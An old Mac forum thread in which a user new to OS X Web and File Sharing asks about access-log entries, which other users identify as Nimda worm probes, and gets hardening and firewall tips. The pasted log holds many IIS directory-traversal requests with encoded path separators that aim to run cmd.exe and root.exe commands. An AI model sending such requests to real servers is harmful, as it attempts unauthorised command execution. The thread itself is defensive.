|
#1
| |||
| |||
| How sercure is OS X's Web Sharing and File Sharing? I was just wondering how sercure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something What does this mean? (NOTE: I removed the IP address.) - - [12/Oct/2001:12:12:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 - - [12/Oct/2001:12:12:12 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 - - [12/Oct/2001:12:12:12 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 - - [12/Oct/2001:12:12:17 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir - - [12/Oct/2001:12:12:41 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 - - [12/Oct/2001:12:12:41 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 - - [12/Oct/2001:12:12:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 - - [12/Oct/2001:12:12:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 - - [12/Oct/2001:12:12:43 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 - - [12/Oct/2001:12:12:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 - - [12/Oct/2001:12:41:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 - - [12/Oct/2001:12:41:09 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 - - [12/Oct/2001:12:41:09 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 - - [12/Oct/2001:12:41:10 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 - - [12/Oct/2001:12:41:10 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 - - [12/Oct/2001:12:41:10 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 - - [12/Oct/2001:12:41:11 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 - - [12/Oct/2001:12:41:11 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 - - [12/Oct/2001:12:41:11 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 - - [12/Oct/2001:12:41:12 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 - - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 - - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 - - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 - - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 - - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 - - [12/Oct/2001:12:41:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 - - [12/Oct/2001:14:34:31 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 - - [12/Oct/2001:14:34:34 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 - - [12/Oct/2001:14:34:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 - - [12/Oct/2001:14:34:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 - - [12/Oct/2001:14:34:37 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 - - [12/Oct/2001:14:34:38 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 - - [12/Oct/2001:14:34:39 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 - - [12/Oct/2001:14:34:40 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 - - [12/Oct/2001:14:34:41 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 Also any tips for people running Web and File Sharing to make sure everything is sercure? |
|
#2
| ||||
| ||||
| Re: How sercure is OS X's Web Sharing and File Sharing? Quote:
Apache is a solid, battle-tested web server. It's a very popular open source project, which means there are lots of sets of eyes looking at the code and correcting vulnerabilities before they can be widely exploited. In contrast, IIS is a closed project and arguably it was originally written with a pretty lax eye towards security. Only now that it has become a corporate embarassment has the developer focused upon securing it. To keep up on security issues wrt OS X Web Sharing, I would suggest keeping an eye on http://www.apache.org and http://www.securityfocus.com
__________________ iMac DV+ (Sage), 450MHz G3 512MB RAM, 20GB HD (ATA), DVD (ATA) ProductName: Mac OS X ProductVersion: 10.1.4 BuildVersion: 5Q125 |
|
#3
| ||||
| ||||
| http://www.securitytracker.com is yet another resource to visit. Security is quite interesting, if computers and the internet interest you... ![]()
__________________ Twyg To laugh often and much; to win the respect of intelligent people and the affection of children...to leave the world a better place...to know even one life has breathed easier because you have lived. This is to have succeeded. - Ralph Waldo Emerson |
|
#4
| ||||
| ||||
| Yep thats nimda. My personal rule for running a server is, Walk softly and carry the BAN stick. Basicly, if they start hitting you like this you can try to contact them if you can, or you can just block their requests to port 80 on your machine through your firewall. Someone gets out of line? Ban them. Check out BrickHouse (versiontracker.com) for a good app to set up your firewall with.
__________________ iMac 800 15", Mac OS X 10.3.2 Dell OptiPlex GX200, RedHat Linux (ugg) 9 |
|
#5
| ||||
| ||||
| What is a good log checking app Or better yet, if I have to do it by hand where are the httpd logs normally placed?
__________________ G4 Powerbook (I Finally got my Titanium) PHP/MySQL Developing where ever I want! I will help whomever asks, just IM or email me. |
|
#6
| ||||
| ||||
| Im not running a web server on this box but Apache by default stores its logs in /var/log/httpd/
__________________ iMac 800 15", Mac OS X 10.3.2 Dell OptiPlex GX200, RedHat Linux (ugg) 9 |
![]() |
| Thread Tools | |
|
|
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Windows File Sharing Refused: Switcher needs help | don_ie | Networking & Compatibility | 6 | November 16th, 2003 08:28 AM |
| can't do file sharing | malexgreen | Networking & Compatibility | 1 | April 2nd, 2003 08:32 PM |
| Windows File Sharing on Startup? | Sogni | Mac OS X System & Mac Software | 0 | February 6th, 2003 11:48 AM |
| [HOWTO] - Modify the personal web sharing | solrac | HOWTO & FAQs | 2 | September 5th, 2002 11:04 PM |
| File Sharing never ending starting up | marfry | Mac OS X System & Mac Software | 0 | November 15th, 2000 08:22 AM |